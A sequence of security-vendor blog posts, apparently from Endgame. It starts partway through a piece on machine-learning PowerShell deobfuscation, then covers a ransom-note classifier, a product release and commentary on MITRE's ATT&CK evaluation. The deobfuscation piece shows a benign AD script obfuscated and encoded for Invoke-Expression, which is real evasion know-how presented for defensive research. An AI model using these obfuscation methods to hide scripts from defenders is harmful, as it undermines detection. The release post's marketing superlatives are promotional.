Grab most variables and keywords that can be random case obfuscated
Use the obf word as input and non-obf word as desired output
Predicts the next char using the previous predictions and new input data

The retrained network had some fun quirks:

But in general performed quite nicely:

Putting It All Together

Now that we have a File Status Classifier, a Decoder, a Deobfuscator, and a Cleanup Network, we’re ready to package it all together into one function and test it out.

Again, our steps are as follows:

Figure 10: Deobfuscation Logic Flow

Let’s start with a non obfuscated file:

param
(
    [Parameter(Mandatory=$false)] $Domain = 'airtran.com',
    [Parameter(Mandatory=$true)]  $SrNumber,
    [Parameter(Mandatory=$false)] $TargetPath = 'OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com',
    [Parameter(Mandatory=$true)]  $User
)

if (Test-Path $User)
{
    $UserList = Get-Content -Path $User
}
else
{
    $UserList = $User
}

$Container = 'OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com'
$Description = "Terminated per $SrNumber"

foreach ($User in $UserList)
{
    Set-ADUser -Identity $User -Server $Domain -Enabled $false -Description $Description
    $UserHandle = Get-ADUser -Identity $User -Server $Domain
    Move-ADObject -Identity $UserHandle -Server $Domain -TargetPath $Container
}

Figure 11: Original Sample

We obfuscate it using a random set of techniques:

param
(
    [Parameter(MANdAtORy=${FA`L`SE})] ${dO`m`AiN} = ("{2}{1}{0}{3}" -f 'a','rtr','ai','n.com'),
    [Parameter(MandatOrY=${tr`UE})]  ${Sr`NUM`BER},
    [Parameter(mAnDATORY=${F`AL`SE})] ${targET`p`Ath} = ("{10}{11}{1}{2}{9}{14}{3}{12}{5}{7}{4}{0}{8}{13}{6}" -f'=a','=Airtr','a','ir',',DC','a','C=com','n','i','n','OU=Disab','led,OU','tr','rtran,D',' Users,OU=A'),
    [Parameter(ManDAtOrY=${T`RUe})]  ${us`er}
)

if (&("{2}{1}{0}"-f'Path','est-','T') ${US`eR})
{
    ${USER`li`sT} = &("{0}{2}{3}{1}" -f'Ge','nt','t-','Conte') -Path ${u`SEr}
}
else
{
    ${usER`L`ISt} = ${Us`Er}
}

${c`oNT`AIneR} = ("{3}{11}{4}{8}{5}{0}{7}{10}{6}{2}{1}{9}" -f'ir','irtran,',',DC=a','OU','a',',OU=A','an','tran Users,OU=Air','bled','DC=com','tr','=Dis')
${D`eS`CrIP`TIon} = ('Term'+'ina'+'ted '+'per'+''+"$SrNumber")

foreach (${uS`eR} in ${U`S`E`RList})
{
    .("{2}{0}{1}" -f'et','-ADUser','S') -Identity ${Us`ER} -Server ${D`OM`AIN} -Enabled ${FA`LsE} -Description ${D`eSCrI`P`TION}
    ${UsE`RHan`dlE} = &("{2}{0}{1}"-f'U','ser','Get-AD') -Identity ${us`eR} -Server ${Do`M`AiN}
    &("{3}{1}{2}{0}" -f't','je','c','Move-ADOb') -Identity ${uSe`Rh`AnD`Le} -Server ${doM`A`In} -TargetPath ${C`O`Nt`Ainer}

Figure 12: Obfuscated Sample

And then encode it:

InVoKe-eXPreSsION ( [STRInG]::join('' , (( 13,10,112 , 97 , 114 ,97 , 109 , 13,10 ,40,13,10,32, 32 ,32 ,32,91 ,80 ,97 ,114 ,97 , 109 , 101 ,116 ,101 ,114,40 , 77, 65, 110 , 100, 97 ,116,111,82, 121,61, 36,123 ,102 , 65 ,96, 108 ,96,83 , 101 , 125,41,93,32, 36 ,123, 100,79,77,96,65 ,96,105,78,125 , 32 ,61 ,32 , 40 ,34 ,123,51, 125,123 ,50,125 , 123,49, 125 , 123, 48,125 ,34 ,45,102,39 ,109, 39, 44 ,39, 97,110 ,46 ,99,111, 39,44 ,39 , 114,39,44, 39 ,97 , 105,114, 116 ,39,41, 44 ,13 , 10, 32, 32, 32, 32,91 , 80 ,97, 114 ,97,109 ,101,116 , 101, 114,40 ,77, 97,78,68 ,65, 84, 111 , 114, 89 , 61 , 36 ,123 ,116 ,82 ,96 , 85, 101 , 125 , 41 ,93 , 32 ,32, 36,123, 83 , 96 , 82 , 96 ,78 , 85 , 96 ,109, 66 ,101,114,125 ,44 , 13,10, 32,32 ,32,32 , 91,80 ,97 ,114,97 ,109 , 101,116, 101 , 114, 40 , 109, 97 ,110 , 100,97,84,79 , 114 ,121,61, 36 , 123 ,70, 65 ,108 , 96,115 ,69,125, 41 , 93 ,32 ,36,123 , 116,65 ,114, 96 ,71 ,69 , 96,84,96,112, 65 , 116 ,72, 125 ,32 , 61 ,32 , 40 , 34 , 123 , 48, 125, 123, 56 ,125 , 123 , 50 ,125 ,123 ,55 ,125,123 ,49 , 51 , 125 , 123,57 ,125,123, 52, 125, 123,51 ,125 ,123 , 49 ,50 ,125, 123 ,49, 49,125,123,49 , 48 ,125, 123 , 54 ,125 , 123 ,53, 125, 123 ,49 ,125,34, 32,45 , 102 , 32,39 ,79 , 85 ,39 , 44 ,39 ,68,67, 61, 99, 111, 109,39, 44 ,39,100,44, 79, 85, 39 , 44, 39 ,85 ,39, 44,39 , 115, 101,114 , 115 ,44 ,79 , 39,44, 39, 116 ,114 , 97, 110 , 44 , 39 , 44 ,39,105,114 , 39 , 44,39,61, 65 ,39, 44, 39, 61 , 68,105,115 , 97 ,98, 108 ,101, 39, 44 , 39,114 , 97,110 ,32, 85,39, 44 ,39 ,61, 97 ,39 , 44 , 39,65 , 105, 114 , 116 ,114,97, 110, 44 , 68 , 67 ,39 , 44 , 39, 61, 39 , 44,39, 105 , 114 ,116 ,39 ,41,44,13 ,10 ,32, 32,32 ,32 , 91 , 80 , 97 ,114,97,109,101 , 116, 101,114, 40,109,97, 78,100 , 97 , 84 , 111 , 82, 121 , 61 ,36, 123 ,84 ,96, 82,117 , 101 ,125,41, 93 , 32 , 32, 36 , 123,85,96, 115 ,69 ,82, 125 ,13, 10 ,41 ,13 ,10, 13 , 10,105, 102, 32 ,40 ,38 , 40,34 ,123 , 50, 125 ,123,49 , 125, 123, 48 , 125 ,34,32, 45 , 102 ,39,116 , 104, 39,44 ,39 ,80 ,97,39,44 ,39 ,84, 101,115, 116 ,45 , 39 , 41, 32 , 36 , 123, 85 ,83 ,96 ,69,114 , 125 ,41,13 ,10 , 123,13 , 10 ,32 , 32,32,32,36 , 123 ,85,96, 115,69 , 114 , 108, 96 ,105 , 83 , 116 ,125, 32 ,61 ,32 , 38, 40 , 34 ,123,50 , 125,123, 48 ,125, 123 , 49 ,125, 34 , 45 ,102 ,32, 39 , 101, 116, 45,67 ,111, 110 , 39 ,44,39 , 116 , 101, 110 ,116,39 , 44,39 , 71,39,41, 32 , 45,80 ,97, 116,104 , 32, 36 , 123,117,96,83 , 69 ,82, 125 , 13,10 , 125,13, 10 ,101 , 108 ,115 , 101 , 13 ,10 , 123,13 ,10 ,32,32 , 32 , 32, 36 , 123 , 117,96 ,115, 96 , 101 , 82 , 76 , 96, 105,115, 84 ,125,32 ,61,32, 36, 123,85 ,96 ,83, 101 ,114,125 , 13,10 , 125 , 13,10,13, 10, 36 , 123 , 99 ,79,96, 78 ,116,97 , 73,110 , 96 , 69 ,82, 125 , 32,61 , 32 , 40 ,34 ,123 ,51,125 , 123, 52 , 125, 123, 48 , 125 , 123 , 54 ,125, 123 ,49,48 , 125,123,57 , 125,123 ,56 ,125,123,49 , 125 , 123,55, 125 , 123,49 , 50 ,125 , 123 ,49 ,49, 125,123 ,50 ,125,123 ,53,125 , 34 ,45 ,102, 39,101, 100 ,39 ,44 ,39 , 115 ,44, 79, 85, 61,65 ,105 , 114, 39 , 44 ,39 , 110 , 44, 39,44 , 39 ,79 ,85, 61 , 68 , 105,115 , 39 , 44,39, 97 ,98, 108 ,39 ,44, 39 ,68 , 67 ,61, 99 , 111,109 ,39 , 44 , 39,44 , 79,85, 39, 44 ,39 ,116,114 , 39 ,44, 39, 114 , 39,44,39,97 ,110 , 32 ,85, 115,101, 39 ,44,39,61, 65 , 105 , 114 , 116, 114 ,39 ,44 , 39, 97, 39 , 44 ,39,97, 110, 44, 68 ,67, 61,97,105 ,114 ,116 ,114 ,39, 41 ,13, 10 , 36 , 123,100 ,69,115,96,67 ,114 , 73, 96, 112,84 , 105 ,96 ,111,78, 125 , 32, 61 ,32 , 40,39 ,84,101,114 ,109 , 105,110 ,97, 39,43 , 39 , 116 , 39 , 43 , 39 ,101, 39 ,43, 39, 100 , 32,39, 43 , 39,112,39,43 ,39 ,101, 114 ,32 ,39 , 43 , 34 ,36, 83, 114,78,117 , 109 , 98 ,101, 114 , 34,41,13 ,10 , 13,10,102 , 111 , 114 ,101 , 97,99 , 104 , 32, 40 ,36 , 123 ,117, 83 ,96,101,114 ,125,32,105 , 110,32,36, 123 , 117,96 , 83 ,69, 114 ,96, 76, 96 , 105, 115 ,84 ,125,41, 13 , 10 ,123 ,13 , 10, 32, 32, 32 , 32,46 ,40, 34 ,123 , 49 ,125, 123 , 51, 125,123 ,48,125,123, 50, 125,34, 45 ,102, 32 , 39 , 101,39,44,39,83 ,39,44,39 ,114 ,39 ,44,39 , 101 ,116 , 45, 65,68, 85 , 115,39,41, 32 , 45,73,100, 101 , 110 ,116, 105 , 116 , 121 , 32 ,36 ,123, 117,96, 83 ,69 , 114, 125 ,32 ,45 , 83 , 101 ,114, 118 , 101 ,114 ,32 ,36, 123 ,68 , 79, 77, 96 ,65, 105 ,110 , 125 ,32, 45, 69 ,110 , 97 ,98,108 , 101,100,32 ,36, 123 ,70 , 65 ,96,76,96 , 115, 69 , 125, 32 ,45 , 68 ,101 ,115 , 99, 114, 105, 112, 116, 105 , 111,110 , 32,36, 123 ,68 , 101,96,115 , 99,82 ,73,96 , 112 , 116 ,96, 73 , 111, 110 , 125, 13,10,32 ,32 , 32 , 32 , 36,123,85,83,96,69 , 114,96, 72, 65 , 78, 68, 96 , 108 ,101,125,32,61, 32 ,46,40 , 34,123,49,125 , 123,50 , 125 , 123, 48,125 , 34 , 45 , 102, 39, 101,114, 39, 44, 39 ,71 ,101, 116,45, 65, 68 ,85, 39,44 ,39,115 , 39,41,32, 45 , 73 , 100 ,101 , 110 ,116 , 105 , 116,121 ,32,36 ,123, 117 , 96 , 115, 101 ,82 ,125, 32 , 45 ,83, 101,114 , 118,101, 114 , 32,36, 123,68,79 ,109 , 96,65,96 ,73,110 ,125 ,13 , 10, 32,32 , 32 , 32 ,38 , 40,34,123,51,125 ,123, 49,125,123,48 ,125 ,123 , 50 , 125,34 ,32 ,45 ,102, 32 ,39, 106, 101 ,39 , 44 ,39 ,68, 79 ,98 ,39 ,44 , 39 , 99,116 ,39 ,44, 39,77,111 , 118, 101 , 45 , 65,39 , 41,32 , 45, 73 , 100,101, 110,116,105,116 ,121, 32,36 ,123,117 ,115, 96 , 101 ,96,82 , 104,97 ,96 ,78 , 100 ,76 , 69 ,125 , 32 ,45 ,83 , 101 ,114 , 118, 101 , 114 ,32, 36 ,123 , 100, 111 , 96,77 ,65,96, 73,78 ,125,32,45 ,84 ,97,114, 103 , 101, 116,80 ,97,116 , 104, 32 ,36,123 ,99 , 79, 96,78,116 , 97,73 , 96 ,78,96,69,82,125 ,13 ,10 ,125 , 13,13 ,10 )| foreACH{ ( [CHAr][iNt]$_) }) ))

Figure 13: Obfuscated and Encoded Sample

Now we can run it through our system. This returns two outputs: 1) A partially fixed version that does everything but the cleanup network; 2) A fully fixed version that includes the cleanup network. This is because the cleanup network is still very much experimental and might produce unintended output.

Partially Fixed:

param
(
    [Parameter(MAndatoRy=${fAlSe})] ${dOMAiN} = "airtran.com",
    [Parameter(MaNDATorY=${tRUe})]  ${SRNUmBer},
    [Parameter(mandaTOry=${FAlsE})] ${tArGETpAtH} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com",
    [Parameter(maNdaToRy=${TRue})]  ${UsER}
)
if ("Test-Path" ${USEr})
{
    ${UsErliSt} = "Get-Content" -Path ${uSER}
}
else
{
    ${useRLisT} = ${USer}
}
${cONtaInER} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com"
${dEsCrIpTioN} = ('Terminated per $SrNumber")
foreach (${uSer} in ${uSErLisT})
{
    "Set-ADUser" -Identity ${uSEr} -Server ${DOMAin} -Enabled ${FALsE} -Description ${DescRIptIon}
    ${USErHANDle} = "Get-ADUser" -Identity ${useR} -Server ${DOmAIn}
    "Move-ADObject" -Identity ${useRhaNdLE} -Server ${doMAIN} -TargetPath ${cONtaINER}
}

Figure 14: Partially Deobfuscated Sample

Fully Fixed:

param
(
    [Parameter(Mandatory=$false)] $domain = "airtran.com",
    [Parameter(Mandatory=$true)]  $srnUmber,
    [Parameter(Mandatory=$false)] $targetPath = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com",
    [Parameter(Mandatory=$true)]  $User
)
if (Test-Path $user)
{
    $userList = Get-Content -Path $User
}
else
{
    $userList = $user
}
$container = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com"
$Description = "Terminated per $SRNumber"
foreach ($user in $UserList)
{
    Set-ADUser -Identity $user -Server $domain -Enabled $false -Description $Description
    ${USErHANDle} = Get-ADUser -Identity $User -Server $domain
    Move-ADObject -Identity ${useRhaNdLE} -Server $domain -TargetPath $container
}

Figure 15: Fully Deobfuscated Sample

Conclusion

Not too shabby. We were able to obfuscate, encode, and then fix a PowerShell script file. This final output is not yet executable, but with a little work we can get there. Deobfuscation is a hard but not insurmountable challenge. Following the basic steps of collecting data, intelligently cleaning it, and applying ML techniques where appropriate allows us to reliably solve burdensome tasks to improve our workflow. With a little perseverance and helpful math, we can put the toothpaste back in the tube.

Despite a decrease in deployment in 2018, ransomware remains a widespread problem on the Internet as malicious actors seek to shift towards more targeted campaigns (e.g. SamSam) and leverage more subtle methods of distribution rather than spear phishing messages. Over the last few years, static-based analysis of binaries prior to execution and dynamic detections that attempt to determine anomalous process activity as it occurs have emerged as the dominant approaches to mitigating ransomware.

While these solutions can be effective, they can sometimes take too long to determine if a process is truly malicious or miss certain processes due to focusing solely on executables. As an experimental approach to address these shortcomings, and for presentation at BSidesLV and DEF CON AI Village this year, we developed a machine learning model to classify forensic artifacts common to ransomware infections: ransom notes. Leveraging this model, we were able to prototype a dynamic ransomware detection capability that proved to be both effective and performant.

All related code and resources can be found at the noteclass project’s git repository: https://github.com/endgameinc/noteclass

Ransom Notes

The purpose of ransom notes is pretty straightforward:

Notify victims they have been infected with ransomware and that their files are encrypted
Instruct victims to provide a ransom payment (in the form of Bitcoin or other cryptocurrency) for the means to decrypt and restore access to the files
Provide a deadline for the ransom payment

Ransom notes typically come in the form of TXT files, but there are also several instances of notes comprised of formatted/rich text (HTML, RTF) or images (JPG, PNG, BMP).

Provided below are three examples of ransom notes:

NotAHero

CryptoLocker

The Brotherhood

The three notes, despite pertaining to infections caused by three separate ransomware samples, share a similar vocabulary and carry out the first two or all three of the objectives previously mentioned. With this knowledge in hand, we set out to determine if ransom notes are suitable for automated classification.

Exploratory Research

To determine the suitability of ransom notes for classification, we used K-means clustering as our approach and compiled two datasets:

Ransom notes
- 173 notes obtained from detonating ransomware and scouring research blogs and twitter
Benign data
- 11314 samples (20 Newsgroups dataset)

With our clustering approach, we merged the two distinct datasets into one unlabeled dataset and configured scikit-learn to produce 21 clusters. In our case, 21 is derived from the ransom notes and each of the 20 newsgroups, as we hoped that the benign data from the newsgroups would cluster together according to their respective topics and that the ransom notes would form their own independent cluster.

To prepare the data for clustering, each document in the combined dataset was tokenized:

Initial token preparation
- Newline characters stripped
- All text converted to lowercase
Tokenization
- Non-alphanumeric characters stripped
- Stop words stripped
  - e.g., the, for, your
- Lemmatization
  - encryption → encrypt

The remaining tokenized data was then vectorized by counting word occurrences in each document (CountVectorizer) and then transforming those vectors to more heavily weigh less common (with respect to the entire overall text data corpus) words using term frequency-inverse document frequency (TfidfVectorizer).

To provide an initial overview of the data, we looked at the top 20 words according to the CountVectorizer results.

Top 20 Words

Even without any provided context, these words strongly relate to the previously seen ransom note samples. A quick look at the top bigrams provides additional context and helps to paint a more vivid picture of the data.

Top 10 Bigrams

When the vectorized data was clustered, we ended up with the following results:

Cluster Overview

As highlighted above, the ransom notes appear to have been clustered into their own group in Cluster 3. A brief overview of the topics in the Newsgroups datasets provides additional context into the other clusters:

Topics covered in the 20 Newsgroups set

In order to validate our clustering, we conducted additional tests with varying data. For our first test, we wanted to determine if a ransom note that was not in our dataset would be placed into the correct cluster:

We calculated the distance from the centroid for each of the clusters, and the closest cluster came out to be Cluster 3, as desired.

For our second test, we provided a block of text that contains terms relevant to ransom notes, but without the necessary context or phrasing to comprise an actual ransom note:

According to our results, this text block was placed into Cluster 4, which contains messages from the comp.graphics newsgroup.

Despite the small size of our set of ransom notes (especially in comparison to the overall size of the combined dataset), the data clustered together very well and our two tests demonstrated some nuance in how the data was clustered. Satisfied with the results, we deemed the dataset appropriate for classification and began building out our prototype.

POC Framework

Since the ultimate goal is to detect the presence of a ransom note on a live system as quickly as possible after it is written to disk, we came up with the following high-level requirements:

Obtain file change events in near real-time
Obtain paths of newly created text files
Read in file contents and determine if data consists of a ransom note
If file is a ransom note, suspend the source process and notify user of activity

Provided below is a diagram that describes how the framework operates and responds to a ransomware process dropping a ransom note to disk:

Ransomware Attack Scenario / Framework Workflow Diagram

Since this was developed as a POC, we decided to restrict our data to English TXT files less than 20 KBs in size. For our purposes, though, these restrictions still cover a majority of ransom note samples that have been surveyed by researchers over the last few years, while helping our framework avoid other potential noise.

To improve the accuracy of the classifier, we made some changes to our dataset. For the benign data, we reduced the number of messages from the Newsgroups 20 dataset down to a little over 8000 and then added over 3000 Windows TXT files (primarily README and log files). We procured more ransom notes and more than doubled the size of the set. Finally, we leveraged SMOTE (Synthetic Minority Oversampling Technique) to address the significant dataset imbalance of the number of notes versus the size of the benign dataset.

Classifier

Before we built the framework, we needed to build and test our model. As with our exploratory research, we carried out the same data sanitization and tokenization routine and feature selection was performed via TF-IDF. In contrast to our earlier research, we labeled each document as benign or ransom note data with the end goal of employing binary classification to any text and answering a simple question: “Is this text a ransom note or benign data?” We based our classifier on a Naïve Bayes model due to its relative ease of training, use, and speed.

At a high-level, our data processing pipeline abides by the following workflow diagram:

Data Processing Pipeline

We utilized scikit-learn’s train_test_split to randomly partition our complete dataset into training (80%) and test (20%) subsets in order to fully test our model and get a more clear picture of its accuracy.

In our first test, we achieved the following results:

Accuracy: 99.54%

F1 Score: 91.86 (scaled to 100)

Confusion Matrix:

TN=2934	FP=14
FN=0	TP=79

While promising, one test only provides a glimpse into the model, and thus cross validation is required. To achieve this, we used ShuffleSplit to conduct a total of ten separate runs with varying training and test data sets for each run. As the results and graphs below demonstrate, the model remained robust to the additional tests.

Average Accuracy: 99.44%

Average F1 Score: 90.1

Average Confusion Matrix:

TN=2933.3	FP=16.5
FN=.5	TP=76.7

Graph Depiction of Ten Individual Test Runs: X-Axis differentiates each test iteration, whereas Y-Axis represents Accuracy (top) and F1 Score (bottom)

Event Listener

After training an effective model, our next step was to develop an event listener. Before we started, we defined two basic requirements for our listener:

Monitor events from all active processes on the host
- In particular, create events
- Limit to TXT files
Map each event to a source process

Since our goal was to quickly build a prototype framework, we used a pre-built tool that would do most of the heavy lifting in terms of gathering events. Luckily for us, the Windows SysInternals tool suite provides one application that filled that need for us: Sysmon. Newer versions of Sysmon provide a custom Event ID for file creation activity:

With this, we built a configuration file optimized to only capture file creation events for .txt files:

Sysmon Configuration

While installing Sysmon with a configuration file is straightforward, a registry key needs to be added to open up access to reading the event logs from external applications.

Registry Modification

After setting up and configuring the environment properly, we proceeded to develop a python script to poll the event log for file creation events using WMI Query Language. The query ended up being the following:

SELECT * FROM Win32_NTLogEvent 
	WHERE LogFile = 'Microsoft-Windows-Sysmon/Operational’ 
	AND EventCode = 11 
	AND RecordNumber > MaxRecordNumber

Any events that popped up in the event log would be parsed then inserted into a work queue for the classifier to process.

After integrating the classifier with the event logging component, the final piece of the framework that needed to be completed was process mitigation. The requirements we sketched were fairly straightforward:

Determine if the process ID and process name (parsed from event log output) exist
- Suspend process if it is currently active
Alert user of ransom note detection
- Allow user to decide to terminate or resume process
- Maintain whitelist of resumed processes

Here is a video of the completed framework in action:

After limited testing against ransomware samples that we know generate TXT file-based ransom notes, we were able to detect samples from the following families:

TQV
Globelimposter
BTCWare
Everbe
Volcano
Rapid
Gandcrab
Painlocker
Sigrun (note in training set)
Josepcrypt (note in training set)
WhiteRose (note in training set)

As with most prototype applications, there are some limitations to this framework and approach. Ransomware samples that don’t drop ransom notes, and specifically TXT ransom notes, would not be detected. Samples that drop notes later in the process life cycle would also degrade any quick detection capabilities afforded by this approach. Also, the model was only trained on English-based text, so any non-English ransom notes would likely not be detected.

Ransomware that attacks systems in other ways (e.g. MBR, raw disk/full disk encryption, screen locking) are likely not covered by this approach.

Conclusion

Current ransomware detection approaches focus largely on static and dynamic malware detection, ignoring the ransom note itself to inform detection. Our research into applying machine learning classification demonstrated that ransom notes share enough features to be properly classified. With the classifier as the core component of a prototype framework, we demonstrated great potential for detecting ransomware earlier in the process lifecycle with this approach over typical dynamic detection frameworks. We will continue to evolve this new approach and explore novel means to apply machine learning to provide the best and most innovative protections possible.

Today we announced the availability of version 3.3 of the Endgame platform, our seventh update of 2018. This release includes the industry’s first flexible architecture to fully support cloud, on-premises and hybrid deployment for lowest cost of operations and complex compliance requirements.

As a cloud-driven release, customers do not need to take any action on their endpoints to take advantage of the new capabilities and features. This release is specifically designed to address the major challenges of enterprise security teams: enhancing the protection and scalability to stop attacks before damage and loss, and continues to drive operational improvements in advanced hunting and response by augmenting the skills of security analysts at any experience level.

New features in version 3.3 include:

Multi-tier data model supporting cloud and on-premises options to accommodate the global compliance requirements of complex organizations while preserving a complete timeline of all events, wherever endpoints are deployed.
Total Attack Lookback™ provides 120 days of non-repudiable forensic information about an incident and exceeds the average adversary dwell time at zero additional cost.
Unique workflow automation and autonomous agent operations are extended by this architecture across global deployments.

The new architecture increases the scope, power and performance of Endgame’s groundbreaking automation technologies, Artemis, Resolver and EQL, eliminating the biggest barriers to immediate productivity by investigators, hunters and IT operations. It also makes critical threat intelligence data available to all customers free of charge through Total Attack Lookback™ - the industry’s first forensic review feature to exceed average adversary dwell time.

Using plain English, global attack visualization, and the industry’s first event query language optimized for security investigation, Endgame Total Attack Lookback™ provides analysts with a complete record of relevant operating system events to determine the origin and extent of a compromise and can serve as a guide to drive compliance and notification requirements.

Store Data Your Way Without Compromising Security Operations

The EU GDPR has led organizations to look very carefully at where their data lives, and Endgame allows for organizations to segment their data storage requirements in a way that works for them, rather than being forced to send everything to a central cloud platform.

Endgame customers now have the ability to deploy, extend, or modify their Endgame infrastructure to store forensic endpoint activity data in any combination of three storage destinations:

Streamed to Endgame Global Services – With the ever-increasing number of dissolvable VDI systems and endpoints that are not always connected to an organization’s private network, Endgame makes it simple to easily query historical data even if the system is offline, roaming, or completely destroyed. With Global Search, Endgame allows customers to use the same Artemis™ investigation tools across the streamed data from a single UI.

Distributed across endpoints – The forensic data can be stored on the endpoint and easily accessed, searched and investigated through the single Endgame console using Artemis™, our AI-powered chatbot that understands plain English questions and streamlines the investigation and hunting workflow used to interact with endpoint data.

Streamed to private data stores – Organizations with a mature security operations function are investing in data analytics, and Endgame provides the ability to take our tamper-resistant, enriched endpoint data and integrate it easily into any third-party system like Splunk, Hadoop, or ELK. Endgame’s API allows vendors and customers to build their own native integrations and we are rapidly adding more integration partners with a ServiceNow app available later this year.

Only Endgame offers the ability to mix and match any of the above options, meaning a customer can have a hybrid approach to meet their organizations unique requirements.

For example, one Endgame customer has their network divided into two sections. The first network streams endpoint data to Endgame Global Services for all systems that may be offline, roaming or destroyed (in the case of VDI or cloud workloads), and also streams to their own in-house data analysis system. The second network section stores event data locally due to limited bandwidth. Using Artemis™, their security analysts are able to easily query and run investigations and hunts across all endpoint information from devices on both networks, without thinking about where the data is stored or where the endpoint is located. 

Total Attack Lookback™

Though some vendors still like to claim they can prevent everything from malware to adversaries, Endgame knows that prevention in any aspect of security is not 100% perfect, and as an industry we know that the average dwell time remains above 90 days. If the endpoint data is not retained long enough, it may be impossible to fully investigate or perform root-cause analysis.

Unlike most endpoint security or EDR vendors who only allow retention to take place in their (often US-based) cloud – and some vendors will also limit their lookback capabilities by only offering 7-days of data storage before passing additional storage costs on to their customers – Endgame’s Total Attack Lookback™ feature allows full investigations and hunting to span 120 days of the tamper-resistant forensic data, while customers remain in complete control of where their data lives. All at no extra cost.

This customer-oriented approach to data storage, simplifying and enhancing the efficiency of security operations, makes Endgame the only complete endpoint security platform that truly allows an extreme reduction in the risk of breach, without increasing the business risk of data privacy.

More information about the Endgame Architecture and Total Attack Lookback™ can be found on our site or by requesting a demo.

Today, MITRE published the results of their first public EDR product evaluation. This effort was a collaboration between MITRE and seven EDR vendors to understand how various products can be used to provide security teams with visibility into post-compromise adversary techniques. In the test, MITRE executed a set of techniques using open source methods mirroring previously-observed APT3 techniques. In their write-up, they’ve supplied information about how vendors provided alerting and/or visibility into data associated with their execution of a technique.

This is an extremely valuable contribution to the infosec community. Frank, Katie, Blake, Chris and others at MITRE should be applauded for all the hours and energy they poured into generating this groundbreaking body of knowledge. The testing was well organized, the data captured thorough, and the finalization of results fair and collaborative. That last point is especially noteworthy given the huge amount of nuance and inherent lack of any one universal “right way” to address much of ATT&CK. This evaluation is a great achievement from MITRE, and we look forward to working with MITRE on continually refining the process and participating in future tests.

As we reflect on the test and what it means, we would like to add some perspective to put the results into context.

Why the MITRE ATT&CK evaluation is valuable and important

Product testing is not new. Endgame is a participant in public testing and an active member of the Anti-Malware Standards Testing Organization (AMTSO). Transparency and openness are foundational Endgame operating principles. Not being afraid of competitive testing and evaluation is a necessary part of that, despite every independant test having different imperfections. We welcome it.

What is new about this test is that it entirely emphasizes post-compromise visibility. Depending on which way you look at it, that’s either intentionally ignored or a complete or near-complete blind spot for public evaluations until now. This matters. Why?

The community has become increasingly aware that it’s not all about exploit and malware blocking. Adversaries can perform operations using nothing but credentials and native binaries. Whether from a vendor or a result of home-grown detection engineering, none of our detections or protections are immune to bypass, no matter anyone’s claims. Organizations need to assume they’re breached and build security programs which allow for the discovery of active attackers in the environment.

MITRE ATT&CK is by far the best, most authoritative knowledge base of techniques to consider in building a detection program which includes the “assume breach” concept. All organizations require tooling to give them data and detection capabilities, whether they build their own or, as most do, work with one or more vendors to provide data gathering, querying capabilities, alerting, and other components.

The ATT&CK product evaluation provides a good reference dataset highlighting various methods of detection. It starts to move towards a taxonomy describing types of detection and visibility - the taxonomy MITRE has given us is complex and perhaps imperfect, but that’s reflective of the problem as a whole. It’s not a simple yes/no answer or a numeric score, like typical tests which measure whether a piece of malware was blocked or not. Most importantly, the evaluation moves us forward in emphasizing the fundamental importance of data visibility when it comes to building a program and considering tooling.

The MITRE evaluation isn’t everything

The evaluation provides a massive amount of data and people will naturally wonder how to action that information. As we’ve described before (and we’re not the only ones), ATT&CK is not a measuring stick. It’s a knowledge base. Trying to use it as a universal, quantitative measurement device is a recipe for failure.

We could probably spend entire posts delving into each of these items, and this list isn’t comprehensive, but some of the pitfalls and challenges inherent to trying to quantify ATT&CK include:

Not considering real world scenarios. In the real world, you don’t need to detect or block every component of an attack to disrupt an adversary or remediate an action. We build layered behavioral preventions and detections for our customers. These layers, working together, provide a vanishing probability of missing a real attack, even if we know it’s likely we won’t alert on every action taken in an attack. We know individual protections will sometimes miss or be bypassed. Similarly, incident responders will tell you that it’s a pipe dream if you ever imagine you will have a completely airtight picture of every technique used by an adversary in a known breach. 100% visibility is not necessary for effective remediation.
Lack of prioritization or weighting of techniques. Is deep, signatureless coverage of process injection more important than knowing that an attacker base64 encoded something on an already compromised box? For any enterprise team I can conceive of, yes, injection coverage is dramatically more important. There’s no notion of prioritization between techniques in ATT&CK. See this post we did last year for a deeper dive into ways technique coverage could be prioritized by teams according to their particular threat landscape and interests. MITRE hasn’t included prioritizations for a reason: it is not a weighted measurement tool, it’s a knowledge base. Turning it into a score sheet can be counterproductive.
ATT&CK is incomplete. MITRE does a great job updating ATT&CK as new techniques become known. This regularly happens due to white hat security research, adversary evolution, and new threat reporting. ATT&CK is by definition always behind the cutting-edge in the real world, and it has gaps. Level of specificity in a given technique also varies widely. We are excited about future decomposition of techniques into sub-techniques, as there are usually a number of known methods to invoke a single technique. In this particular evaluation, you’ll note some cases where MITRE chose a few different ways to implement a single technique. This is good and reflective of reality. But, there are huge number of untested alternative implementations even for the techniques used in this evaluation. Testing everything would be nearly impossible.
Noise in production. Is an alert better than telemetry? Sometimes yes, sometimes no. The majority of the activity described in ATT&CK is seen in most enterprises on a daily basis. We cannot seek alerting coverage across all of ATT&CK. It would overwhelm security teams with noise and FPs. Taking that idea further, we shouldn’t even overextend in an attempt to provide visibility to every cell - there are diminishing returns in the real-world in doing so.
Data robustness. Not all data is created equal in terms of enrichments and hardening against adversaries determined to get around your EDR solution. There’s a growing body of research around this topic, for example this excellent talk by William Burgess called “Red Teaming in the EDR Age.” We highly recommend it and similar work to anyone considering visibility. Many common sources of EDR data can be undermined by an attacker with access. At Endgame, we put a lot of effort into hardening our datasources. Not all EDR vendors do the same. This is an important factor but one which would not be easy to measure in an evaluation.
Evaluating the tool or the Team? For a nuanced evaluation such as this, some amount of expertise and knowledge is required. In the MITRE evaluation, vendors were invited to deploy, configure, and participate in the evaluation on the blue team side. This makes tremendous sense, as MITRE had enough work to do beyond overcoming the often steep learning curve of the various EDR products. Endgame takes great pride in how our customers can consume and make use of advanced capabilities compared with the deep expertise and expertise required for other tools in this space. Assessing usability and accounting for a security team’s expertise would be very hard in an evaluation.
Not a full product assessment. Visibility is one important component of any endpoint security tool. Other important components include prevention, hardening (discussed above), response, usability, and a host of considerations around topics like deployment, endpoint impact, network impact, and more.

